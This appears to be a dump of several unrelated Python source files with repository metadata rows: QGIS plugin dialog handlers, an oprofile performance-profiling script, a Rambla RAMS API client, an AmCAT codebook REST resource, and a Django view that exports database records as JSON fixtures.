This slot is called when the user clicks the minimum needs toolbar
icon or menu item associated with this plugin.
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.minimum_needs import MinimumNeeds
myDialog = MinimumNeeds(self.iface.mainWindow())
myDialog.show()
def showOptions(self):
"""Show the options dialog.
This slot is called when the user clicks the options toolbar
icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.options_dialog import OptionsDialog
myDialog = OptionsDialog(self.iface.mainWindow(),
self.iface,
self.dockWidget)
myDialog.show()
def showKeywordsEditor(self):
"""Show the keywords editor.
This slot is called when the user clicks the keyword editor toolbar
icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.keywords_dialog import KeywordsDialog
if self.iface.activeLayer() is None:
return
myDialog = KeywordsDialog(self.iface.mainWindow(),
self.iface,
self.dockWidget)
myDialog.setModal(True)
myDialog.show()
def showImpactFunctionsDoc(self):
"""Show the keywords editor.
This slot is called when the user clicks the impact functions
toolbar icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.impact_functions_doc import ImpactFunctionsDoc
myDialog = ImpactFunctionsDoc(self.iface.mainWindow())
myDialog.show()
def resetDock(self):
"""Reset the dock to its default state.
This slot is called when the user clicks the reset icon in the toolbar
or the reset menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
self.dockWidget.getLayers()
def layerChanged(self, theLayer):
"""Enable or disable the keywords editor icon.
This slot is called when the user clicks the keyword editor toolbar
icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
if theLayer is None:
self.actionKeywordsDialog.setEnabled(False)
else:
self.actionKeywordsDialog.setEnabled(True)
self.dockWidget.layerChanged(theLayer)
def keyActionF7(self):
'''Executed when user press F7'''
self.showImpactFunctionsDoc()
| gpl-3.0 | 2,372,328,170,521,274,000 | 36.894737 | 79 | 0.567438 | false | 4.771723 | false | false | false |
percival-detector/cppprocessing | tools/profile_processing.py | 1 | 13073 |
import re
import subprocess
import socket
import calibration_data_generator as cdg
import output_processing as op
import datetime
def run_the_function(print_result, height, width, repeat, text_file_name, grain_size):
path_name= "./data/KnifeQuadBPos1_2_21_int16.h5"
top_level_data_set_name= "KnifeQuadBPos1/"
host_name = socket.gethostname()
#Program to execute
debug_version = './Debug/cppProcessing2.0 '
profile_version = './Profiling/cppProcessing2.0 '
parallel_debug = './parallel_debug/cppProcessing2.0 '
parallel_profile = './parallel_profile/cppProcessing2.0 '
cmdl_arg = '1 ' + str(width) + ' '+ str(height) + ' ' + str(repeat) + ' ' + text_file_name + ' ' + str(grain_size) + ' 1'
program_to_execute = parallel_profile + cmdl_arg
#events to monitor
#instructions
event1 = op.oprofile_events('CPU_CLK_UNHALTED','0x00',100000000)
event2 = op.oprofile_events('INST_RETIRED','0x00',60000000)
#cache misses
event3 = op.oprofile_events('LLC_MISSES','0x41',60000) #divide by LLC_REFS
# event4 = op.oprofile_events('l2_lines_in','0x07',1000000) #100000
# event5 = op.oprofile_events('br_inst_retired', '0x01', 400000) #total branch instructions retired
# event6 = op.oprofile_events('br_misp_retired', '0x01', 400000) #total mispredicted branches. Divide by br_inst_retired
event6 = op.oprofile_events('mem_trans_retired','0x02',2000000)
# event7 = op.oprofile_events('uops_retired', 'stall_cycles',2000000) #no of stall cycles. Divide by cpu cycles
#
# event8 = op.oprofile_events('dtlb_load_misses', '0x01',2000000)
# # event8 = op.oprofile_events('dtlb_load_misses', '0x81',1000) #Ivy Bridge
#
# event9 = op.oprofile_events('LLC_REFS', '0x4f',6000)
#
# event10 = op.oprofile_events('l1d_pend_miss', 'pending',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles
# event11 = op.oprofile_events('resource_stalls', '0x01',2000000) #no of stall cycles/divide by number of instructions
# event12 = op.oprofile_events('l1d', '0x01',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles
list_of_events = [event1, event2, event3, event6]#, event7, event8, event9, event10, event11, event12]
#variable initialisation
dict_of_attributes = {}
total_time = 0.0
dict_of_function_perc_time = {}
list_of_events_recorded = []
image_size = width * height * 2 #memory size
total_processing_time = 0.0
operf_events = op.get_operf_option(list_of_events)
result_directory = './oprof_reports/'+ host_name + '/'
report_destination = result_directory + 'profile_report.txt'
sample_data_destination = result_directory + 'oprof_data/'
#commandline options
cmd_git = 'git rev-parse HEAD > ' + report_destination
cmd_time = '(/usr/bin/time -v ' + program_to_execute + ') &>> ' + report_destination
cmd_operf = 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' '+ program_to_execute
cmd_opreport = 'opreport --symbols --session-dir=' + sample_data_destination + ' >> ' + report_destination
cmd_mkdir = 'mkdir -p ' + sample_data_destination
cmd_annotate = 'opannotate -s --output-dir=' + result_directory + 'annotated/ ' + '--session-dir=' + sample_data_destination + ' '+ program_to_execute
op.cmd_call(cmd_git)
op.cmd_call(cmd_time)
op.cmd_call(cmd_operf)
op.cmd_call(cmd_opreport)
op.cmd_call(cmd_mkdir)
op.cmd_call(cmd_annotate)
f = open(report_destination, 'r')
list_of_functions = op.get_function_list(f)
f.close()
for function_name in list_of_functions:
dict_of_function_perc_time[function_name] = 0
dict_of_attributes[function_name] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
f = open(report_destination, 'r')
s = f.readline()
commit_key = s;
while s != '':
if 'Counted' in s:
for event in list_of_events:
if (event.event_name + ' events') in s:
list_of_events_recorded.append(event)
if 'Elapsed (wall clock) time ' in s:
total_time = op.parse_time(s)
for function_name in list_of_functions:
if function_name in s:
delimited = s.split(' ')
parsed = [item for item in delimited if item != '']
attributes = []
dict_of_function_perc_time[function_name] = float(parsed[1]) + dict_of_function_perc_time[function_name]
for index in xrange(len(list_of_events_recorded)): # manually add the percentage clock cycles
attributes.append( float(parsed[index * 2]) + dict_of_attributes[function_name][index] )
dict_of_attributes[function_name] = attributes
s = f.readline()
llc_misses_per_instruction = op.get_llc_misses(list_of_functions, dict_of_attributes, list_of_events_recorded)
CPI = op.get_CPI(list_of_functions, dict_of_attributes, list_of_events_recorded)
bandwidth = op.get_bandwidth(list_of_functions, dict_of_function_perc_time, total_time, image_size, repeat)
function_time = op.get_time(list_of_functions, dict_of_function_perc_time, total_time, repeat)
l1d_miss_rate = op.get_L1D_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
DTLB_miss_rate = op.get_DTLB_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
LLC_miss_rate = op.get_LLC_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
br_misspre_rate = op.get_br_mispre_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
resource_stall = op.get_resource_stall_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
l2_miss_rate = op.get_L2_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
l1d_repl_rate = op.get_L1D_repl_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
memory_bandwidth = op.get_memory_bandwidth(list_of_functions, dict_of_attributes, list_of_events_recorded)
for name, perc_time in dict_of_function_perc_time.iteritems():
total_processing_time = total_processing_time + perc_time * total_time /1000 /100 #in seconds
#printing reports
if print_result == True:
print
print datetime.datetime.now().date(),
print datetime.datetime.now().time(),
print 'Report:'
print cmd_time
print cmd_operf
print cmd_opreport
print 'oprofile sample directory: ' + sample_data_destination
print cmd_annotate
print '=' * 100
print commit_key,
print 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' '+ program_to_execute
print 'The program took {0:.4} ms in total. {1:.4} ms per sample/reset pair.'.format(total_time, total_time/repeat)
print 'Of which the processing functions took in total {0:.4} ms to run.'.format(total_processing_time)
print 'Image size {0:d} ({1:d} * {2:d}) pixels.'.format(width * height, height, width),
print op.get_bytes(image_size)
print 'Statistics collected for '+str(repeat)+' iterations'
print 'Bandwidth:'
print '\t' + 'Total: {0:.4} MB/s'.format(op.get_bytes(image_size * 2 * repeat/total_processing_time) ) #2 because of sample and reset
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0}'.format(op.get_bytes((bandwidth[index]))) + '/s'
print 'LLC misses per instruction:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(llc_misses_per_instruction[index])
print 'Cycle per instruction (CPI):'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2}'.format(CPI[index])
print 'Processing time (ms) for each call:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0}'.format(int(function_time[index]))
if len(l1d_miss_rate) != 0:
print 'L1D misses percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(l1d_miss_rate[index])
if len(l1d_repl_rate) != 0:
print 'L1D replacement rate:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(l1d_repl_rate[index])
if len(l2_miss_rate) != 0:
print 'L2 misses percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(l2_miss_rate[index])
if len(DTLB_miss_rate) != 0:
print 'DTLB miss per instruction:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2}'.format(DTLB_miss_rate[index])
if len(LLC_miss_rate) != 0:
print 'LLC miss rate:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(LLC_miss_rate[index])
if len(br_misspre_rate) != 0:
print 'Branch misprediction percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(br_misspre_rate[index])
if len(resource_stall) != 0:
print 'Resource stall cycle percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(resource_stall[index])
if len(memory_bandwidth) != 0:
print 'Memory Bandwidth'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + op.get_bytes(memory_bandwidth[index])
print '=' * 100
return image_size * 2 * repeat/total_processing_time
repeat = 100 #350 is about the maximum
# width_arr = [2000, 5000, 10000, 20000, 50000, 100000, 500000]
height = 3717
width = 3528
host_name = socket.gethostname()
calib_directory = './calibration_data/'
path_name = calib_directory + host_name + '/'
text_file_name = path_name + 'test_param_file.txt'
grain_size_file_name = './oprof_reports/' + host_name + '/' + 'grain_size_test.txt'
print grain_size_file_name
# subprocess.call('mkdir -p ' + path_name, shell=True)
# cdg.generate_calib_files(height, width, text_file_name, path_name)
# cmd_rm_file = "rm -f " + grain_size_file_name
# cmd_create_file = "touch "+ grain_size_file_name
# op.cmd_call(cmd_rm_file)
# op.cmd_call(cmd_create_file)
grain_size = 3528 * 2
run_the_function(True, height, width, repeat, text_file_name, grain_size)
# 1,3,7,9,21, 59,63,177,413,531,
# * 1239,3717
# for grain_size in (3528, 3528/2,3528/3,3528/4,3528/6,3528/7, 3528*3, 3528*7,3528*9, 3528*21, 3528*59, 3528*63, 3528*177,3528*413,3528*531,3528*1239):
# a = op.accumulator(grain_size_file_name, grain_size, 2)
# for repeats in xrange(1,2):
# bandwidth = run_the_function(True, height, width, repeat, text_file_name, grain_size)
# a.add_number(bandwidth)
# print grain_size, op.get_bytes(bandwidth)
# a.average()
#
# print 'starting'
# grain_size = 20
# run_the_function(True, height, width, repeat, text_file_name, grain_size)
# for index in xrange(9, 41):
# run_the_function(True, height, width, repeat, text_file_name, index)
# print index
# for grain_size in xrange(10000,1000000,2000):
# a = op.accumulator(grain_size_file_name, grain_size, 9)
# for repeats in xrange(1,9):
# bandwidth = run_the_function(False, height, width, repeat, text_file_name, grain_size)
# a.add_number(bandwidth[0])
# print grain_size, op.get_bytes(bandwidth[0])
# a.average()
# #
# width = 50000
# repeat_arr = [1,2,5,10,20,50,100]
# for repeat in repeat_arr:
# run_the_function(True, width, repeat)
#operf -e CPU_CLK_UNHALTED=100000:0:1:1,mem_load_uops_llc_hit_retired=100000:2:1:1,mem_load_uops_llc_hit_retired=100000:4:1:1,mem_load_uops_retired=100000:4:1:1, ./Debug/cppProcessing2.0 0 ./data/KnifeQuadBPos1_2_21_int16.h5 KnifeQuadBPos1/ 500
| apache-2.0 | -993,045,515,792,880,100 | 45.358156 | 244 | 0.615849 | false | 3.15392 | false | false | false |
vwflow/raws-python | raws_json/rams/service.py | 1 | 2364 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 rambla.eu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.import os
import json, os
import raws_json
from raws_json.raws_service import RawsService
class RamsService(RawsService):
def __init__(self, username, password, server=None, ssl = True):
""" Constructor for RamsService, used to send request to the RATS service.
:param username: Name of your Rambla user account
:param password: Pwd of your Rambla user account
:param server: Domain name of the RATS service (optional, default = "rams.enc01.rambla.be")
:param ssl: Set True to use SSL (your account must be SSL enabled) (optional, default = False)
"""
self.username = username
if server is None:
server = "rams.mon01.rambla.be"
super(RamsService, self).__init__(username = username, password = password, server = server, ssl = ssl)
def delete(self, uri):
""" Deletes any resource, given the uri. """
return self.Delete(uri = uri)
def getTotal(self, query = None):
""" Retrieves a total feed.
@return JobEntry object
"""
uri = "/total/"
if query:
query.feed = uri
uri = query.ToUri()
return self.Get(uri = uri)
def getTraffic(self, query = None):
""" Retrieves a total feed.
@return JobEntry object
"""
uri = "/traffic/"
if query:
query.feed = uri
uri = query.ToUri()
return self.Get(uri = uri)
def getStorage(self, query = None):
""" Retrieves a total feed.
@return JobEntry object
"""
uri = "/storage/"
if query:
query.feed = uri
uri = query.ToUri()
return self.Get(uri = uri)
| apache-2.0 | 2,433,817,785,288,375,300 | 32.295775 | 111 | 0.614636 | false | 4.00678 | false | false | false |
aemal/westcat | api/rest/resources/codebook.py | 2 | 4226 | ###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
from amcat.models import Codebook
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from api.rest.resources.amcatresource import AmCATResource
from django.conf.urls import url
import collections
import itertools
MAX_CODEBOOKS = 5
CACHE_LABELS = (2, 1)
def _walk(nodes):
"""Convert all TreeItems to dictionaries"""
for node in nodes:
node = node._asdict()
node['children'] = tuple(_walk(node['children']))
yield node
class CodebookHierarchyResource(AmCATResource):
"""
This resource has no direct relationship to one model. Instead, it's
composed of multiple codebooks. A thorough documentation of the design
of these hierarchies is available on the AmCAT wiki:
- https://code.google.com/p/amcat/wiki/Codebook
Any filters applied to this resource translate directly to filters on
codebooks. For example, you could request the hierarchy of codebook
with id '5' using the following query:
- /codebookhierarchy?id=5
Two special filters can be applied to hierarchies:
- include_missing_parents
- include_hidden
Each filter displayed above can either be true or false and do not
rely on each other. Both default to true.
"""
# ^ Docstring displayed on API web-page as documentation
model = Codebook
@classmethod
def get_url_pattern(cls):
"""The url pattern for use in the django urls routing table"""
pattern = r'^{}$'.format(cls.get_view_name())
return url(pattern, cls.as_view(), name=cls.get_view_name())
@classmethod
def get_view_name(cls):
return cls.__name__[:-8].lower()
@classmethod
def get_model_name(cls):
return "codebookhierarchy"
@classmethod
def get_tree(cls, codebook, include_labels=True, **kwargs):
"""Codebook.get_tree() with caching enabled"""
codebook.cache()
codebook.cache_labels()
return tuple(_walk(codebook.get_tree(include_labels=include_labels, **kwargs)))
def _get(self, request, *args, **kwargs):
qs = self.filter_queryset(self.get_queryset())
if len(qs) > MAX_CODEBOOKS:
return ("Please select at most {} codebook(s)".format(MAX_CODEBOOKS),)
else:
return itertools.chain.from_iterable(self.get_tree(codebook) for codebook in qs)
def get(self, request, *args, **kwargs):
return Response(self._get(request, *args, **kwargs))
class CodebookResource(AmCATResource):
model = Codebook
extra_filters = ["codingschemafield__codingschema__id"]
from amcat.models import Label
from api.rest.resources.amcatresource import AmCATResource
class LabelResource(AmCATResource):
model = Label
extra_filters = ["code__codebook_codes__codebook__id"]
| agpl-3.0 | -7,087,378,154,601,933,000 | 36.070175 | 92 | 0.602461 | false | 4.329918 | false | false | false |
adbrum/InternetofThings | iot/baseDados/views.py | 1 | 14468 | # -*- coding: utf-8 -*-
"""
:Autor: Adriano Leal
:Aluno: 11951
:email: [email protected]
"""
from django import template
from django.http.response import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from iot.models import Equipment, PhysicalCharacteristic, Voltage, Memory, \
Microcontroller, Microcomputer, GPU, Interface, Processor, Sensor, Template
def criar(request):
"""
Cria ficheiros .json com os dados contidos na base de dados.
"""
microcontrolador = Microcontroller.objects.filter()
file_microcontroller = open("iot/fixtures/microcontroller.json", "w")
file_microcontroller.write("[\n")
qt = len(microcontrolador)
for item in microcontrolador:
file_microcontroller.write("\t{\n")
file_microcontroller.write("\t\t\"model\": \"iot.Microcontroller\",\n")
file_microcontroller.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
file_microcontroller.write("\t\t\"fields\": {\n")
file_microcontroller.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n")
file_microcontroller.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
file_microcontroller.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_microcontroller.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_microcontroller.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_microcontroller.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_microcontroller.write("\t}\n")
if qt > 1:
file_microcontroller.write("},\n")
else:
file_microcontroller.write("}\n")
qt -= 1
file_microcontroller.write("]\n")
file_microcontroller.close()
microComputer = Microcomputer.objects.filter()
file_microComputer = open("iot/fixtures/microComputer.json", "w")
file_microComputer.write("[\n")
qt = len(microComputer)
for item in microComputer:
file_microComputer.write("\t{\n")
file_microComputer.write("\t\t\"model\": \"iot.Microcomputer\",\n")
file_microComputer.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
file_microComputer.write("\t\t\"fields\": {\n")
file_microComputer.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n")
file_microComputer.write("\t\t\"model\" : \"" + (item.model).encode("utf-8\n") + "\",\n")
if item.processor_id==None:
file_microComputer.write("\t\t\"processor\" : null,\n")
else:
file_microComputer.write("\t\t\"processor\" : " + str(item.processor_id) + ",\n")
if item.microcontroller_id==None:
file_microComputer.write("\t\t\"microcontroller\" : null,\n")
else:
file_microComputer.write("\t\t\"microcontroller\" : " + str(item.microcontroller_id) + ",\n")
if item.GPU_id==None:
file_microComputer.write("\t\t\"GPU\" : null,\n")
else:
file_microComputer.write("\t\t\"GPU\" : " + str(item.GPU_id) + ",\n")
if item.operatingSystems_id==None:
file_microComputer.write("\t\t\"operatingSystems\" : null,\n")
else:
file_microComputer.write("\t\t\"operatingSystems\" : " + str(item.operatingSystems_id) + ",\n")
file_microComputer.write("\t\t\"dateManufacture\" : \"" + str(item.dateManufacture) + "\",\n")
file_microComputer.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_microComputer.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_microComputer.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_microComputer.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_microComputer.write("\t}\n")
if qt > 1:
file_microComputer.write("},\n")
else:
file_microComputer.write("}\n")
qt -= 1
file_microComputer.write("]\n")
file_microComputer.close()
caracteristica = PhysicalCharacteristic.objects.filter()
file_caracteristica = open("iot/fixtures/physicalCharacteristic.json", "w")
file_caracteristica.write("[\n")
qt = len(caracteristica)
for item in caracteristica:
file_caracteristica.write("\t{\n")
file_caracteristica.write("\t\t\"model\": \"iot.PhysicalCharacteristic\",\n")
file_caracteristica.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_caracteristica.write("\t\t\"fields\": {\n")
file_caracteristica.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_caracteristica.write("\t\t\"length\" : " + str(item.length) + ",\n")
file_caracteristica.write("\t\t\"width\" : " + str(item.width) + ",\n")
file_caracteristica.write("\t\t\"weight\" : " + str(item.weight) + "\n")
file_caracteristica.write("\t}\n")
if qt > 1:
file_caracteristica.write("},\n")
else:
file_caracteristica.write("}\n")
qt -= 1
file_caracteristica.write("]\n")
file_caracteristica.close()
gpu = GPU.objects.filter()
file_gpu = open("iot/fixtures/gpu.json", "w")
file_gpu.write("[\n")
qt = len(gpu)
for item in gpu:
file_gpu.write("\t{\n")
file_gpu.write("\t\t\"model\": \"iot.GPU\",\n")
file_gpu.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_gpu.write("\t\t\"fields\": {\n")
file_gpu.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n")
file_gpu.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
file_gpu.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_gpu.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_gpu.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_gpu.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_gpu.write("\t}\n")
if qt > 1:
file_gpu.write("},\n")
else:
file_gpu.write("}\n")
qt -= 1
file_gpu.write("]\n")
file_gpu.close()
memory = Memory.objects.filter()
file_memory = open("iot/fixtures/memory.json", "w")
file_memory.write("[\n")
qt = len(memory)
for item in memory:
file_memory.write("\t{\n")
file_memory.write("\t\t\"model\": \"iot.Memory\",\n")
file_memory.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_memory.write("\t\t\"fields\": {\n")
file_memory.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_memory.write("\t\t\"RAM\" : \"" + str(item.RAM) + "\",\n")
file_memory.write("\t\t\"SRAM\" : \"" + str(item.SRAM) + "\",\n")
file_memory.write("\t\t\"EEPROM\" : \"" + str(item.EEPROM) + "\",\n")
file_memory.write("\t\t\"flashMemory\" : \"" + str(item.flashMemory) + "\"\n")
file_memory.write("\t}\n")
if qt > 1:
print " > 1", qt
file_memory.write("},\n")
else:
print " == 1", qt
file_memory.write("}\n")
qt -= 1
file_memory.write("]\n")
file_memory.close()
voltage = Voltage.objects.filter()
file_voltage = open("iot/fixtures/voltage.json", "w")
file_voltage.write("[\n")
qt = len(voltage)
for item in voltage:
file_voltage.write("\t{\n")
file_voltage.write("\t\t\"model\": \"iot.Voltage\",\n")
file_voltage.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_voltage.write("\t\t\"fields\": {\n")
file_voltage.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_voltage.write("\t\t\"operatingVoltage\" : " + str(item.operatingVoltage) + ",\n")
file_voltage.write("\t\t\"inputVoltageRecommended\" : \"" + str(item.inputVoltageRecommended) + "\",\n")
file_voltage.write("\t\t\"IOCurrentMax\" : \"" + str(item.IOCurrentMax) + "\",\n")
file_voltage.write("\t\t\"DCCurrentfor3_3VPin\" : \"" + str(item.DCCurrentfor3_3VPin) + "\",\n")
file_voltage.write("\t\t\"powerRatings\" : \"" + str(item.powerRatings) + "\",\n")
file_voltage.write("\t\t\"powerSource\" : \"" + str(item.powerSource) + "\"\n")
file_voltage.write("\t}\n")
if qt > 1:
print " > 1", qt
file_voltage.write("},\n")
else:
print " == 1", qt
file_voltage.write("}\n")
qt -= 1
file_voltage.write("]\n")
file_voltage.close()
interface = Interface.objects.filter()
file_interface = open("iot/fixtures/interface.json", "w")
file_interface.write("[\n")
qt = len(interface)
for item in interface:
file_interface.write("\t{\n")
file_interface.write("\t\t\"model\": \"iot.Interface\",\n")
file_interface.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
file_interface.write("\t\t\"fields\": {\n")
file_interface.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_interface.write("\t\t\"hdmi\" : \"" + (item.hdmi).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"videoInput\" : \"" + (item.videoInput).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"videoOutputs\" : \"" + (item.videoOutputs).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"audioInputs\" : \"" + (item.audioInputs).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"audioOutputs\" : \"" + (item.audioOutputs).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"storage\" : \"" + (item.storage).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"network\" : \"" + (item.network).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"wifi\" : \"" + (item.wifi).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"jack\" : \"" + (item.jack).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"GPIO\" : \"" + (item.GPIO).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"digitalIOPins\" : " + str(item.digitalIOPins) + ",\n")
file_interface.write("\t\t\"analogInputPins\" : " + str(item.analogInputPins) + "\n")
file_interface.write("\t}\n")
if qt > 1:
file_interface.write("},\n")
else:
file_interface.write("}\n")
qt -= 1
file_interface.write("]\n")
file_interface.close()
processor = Processor.objects.filter()
file_processor = open("iot/fixtures/processor.json", "w")
file_processor.write("[\n")
qt = len(processor)
for item in processor:
file_processor.write("\t{\n")
file_processor.write("\t\t\"model\": \"iot.Processor\",\n")
file_processor.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_processor.write("\t\t\"fields\": {\n")
file_processor.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n")
file_processor.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
file_processor.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_processor.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_processor.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_processor.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_processor.write("\t}\n")
if qt > 1:
file_processor.write("},\n")
else:
file_processor.write("}\n")
qt -= 1
file_processor.write("]\n")
file_processor.close()
sensor = Sensor.objects.filter()
file_sensor = open("iot/fixtures/sensor.json", "w")
file_sensor.write("[\n")
qt = len(sensor)
for item in sensor:
file_sensor.write("\t{\n")
file_sensor.write("\t\t\"model\": \"iot.Sensor\",\n")
file_sensor.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_sensor.write("\t\t\"fields\": {\n")
file_sensor.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n")
file_sensor.write("\t\t\"serialNumber\" : \"" + (item.serialNumber).encode("utf-8\n") + "\",\n")
file_sensor.write("\t\t\"model\" : \"" + (item.model).encode("utf-8\n") + "\",\n")
file_sensor.write("\t\t\"function\" : \"" + (item.function).encode("utf-8\n") + "\"\n")
file_sensor.write("\t}\n")
if qt > 1:
file_sensor.write("},\n")
else:
file_sensor.write("}\n")
qt -= 1
file_sensor.write("]\n")
file_sensor.close()
template = Template.objects.filter()
file_template = open("iot/fixtures/template.json", "w")
file_template.write("[\n")
qt = len(template)
for item in template:
file_template.write("\t{\n")
file_template.write("\t\t\"model\": \"iot.Template\",\n")
file_template.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_template.write("\t\t\"fields\": {\n")
file_template.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n")
file_template.write("\t\t\"imagePath\" : \"" + (item.imagePath).encode("utf-8\n") + "\"\n")
#---------------------------------------------------- for i in template:
#--------------------------------------- for j in i.equipment.all():
# file_template.write("\t\t\"equipment\" : " + str(j.id) + ",\n")
file_template.write("\t}\n")
if qt > 1:
file_template.write("},\n")
else:
file_template.write("}\n")
qt -= 1
file_template.write("]\n")
file_template.close()
return HttpResponse("Ficheiros gerados com sucesso!\n")
| gpl-2.0 | 4,508,458,142,560,889,300 | 44.974026 | 112 | 0.528477 | false | 3.185381 | false | false | false |
mleinart/carbon | lib/carbon/tests/test_service.py | 10 | 2820 | import exceptions
from mock import Mock, patch
from unittest import TestCase
